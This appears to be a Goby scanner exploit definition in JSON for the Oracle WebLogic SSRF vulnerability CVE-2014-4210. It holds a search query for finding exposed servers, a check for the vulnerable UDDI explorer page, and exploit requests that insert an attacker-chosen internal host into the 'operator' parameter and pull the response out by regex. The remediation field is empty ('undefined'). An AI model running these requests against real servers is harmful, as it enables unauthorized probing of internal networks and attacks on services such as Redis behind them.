2022-11-25 04:15:33 -08:00
{
"Name" : "Weblogic SSRF漏洞 CVE-2014-4210" ,
"Level" : "2" ,
"Tags" : [
"SSRF"
] ,
"GobyQuery" : "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"" ,
"Description" : "Weblogic中存在一个SSRF漏洞, 利用该漏洞可以发送任意HTTP请求, 进而攻击内网中redis、fastcgi等脆弱组件, 此漏洞可通过HTTP协议利用, 未经身份验证的远程攻击者可利用此漏洞影响受影响组件的机密性\n\nOracle WebLogic Server 10.0.2.0\nOracle WebLogic Server 10.3.6.0\n\nhttp://xxx.xxx.xxx.xxx:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://xxx.xxx.xxx.xxx:7001" ,
"Product" : "Oracle WebLogic Server" ,
"Homepage" : "https://www.oracle.com" ,
"Author" : "PeiQi" ,
"Impact" : "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩🐑</span></p>" ,
"Recommandation" : "<p>undefined</p>" ,
"References" : [
"http://wiki.peiqi.tech"
] ,
"HasExp" : true ,
"ExpParams" : [
{
"name" : "payload" ,
"type" : "input" ,
"value" : "127.0.0.1:7001" ,
"show" : ""
}
] ,
"ScanSteps" : [
"AND" ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/uddiexplorer/SearchPublicRegistries.jsp" ,
"follow_redirect" : true ,
"header" : { } ,
"data_type" : "text" ,
"data" : ""
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "Search" ,
"bz" : ""
}
]
} ,
"SetVariable" : [ ]
}
] ,
"ExploitSteps" : [
"OR" ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search" ,
"follow_redirect" : false ,
"header" : { } ,
"data_type" : "text" ,
"data" : ""
} ,
"SetVariable" : [ "output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)" ]
} ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search" ,
"follow_redirect" : false ,
"header" : { } ,
"data_type" : "text" ,
"data" : ""
} ,
"SetVariable" : [ "output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)" ]
} ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/uddiexplorer/SearchPublicRegistries.jsp?operator=http://{{{payload}}}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search" ,
"follow_redirect" : false ,
"header" : { } ,
"data_type" : "text" ,
"data" : ""
} ,
"SetVariable" : [ "output|lastbody|regex|weblogic.uddi.client.structures.exception.XML_SoapException:(.*)" ]
}
] ,
"PostTime" : "2021-01-23 20:47:39" ,
"GobyVersion" : "1.8.237"
2022-11-25 02:08:58 -08:00
}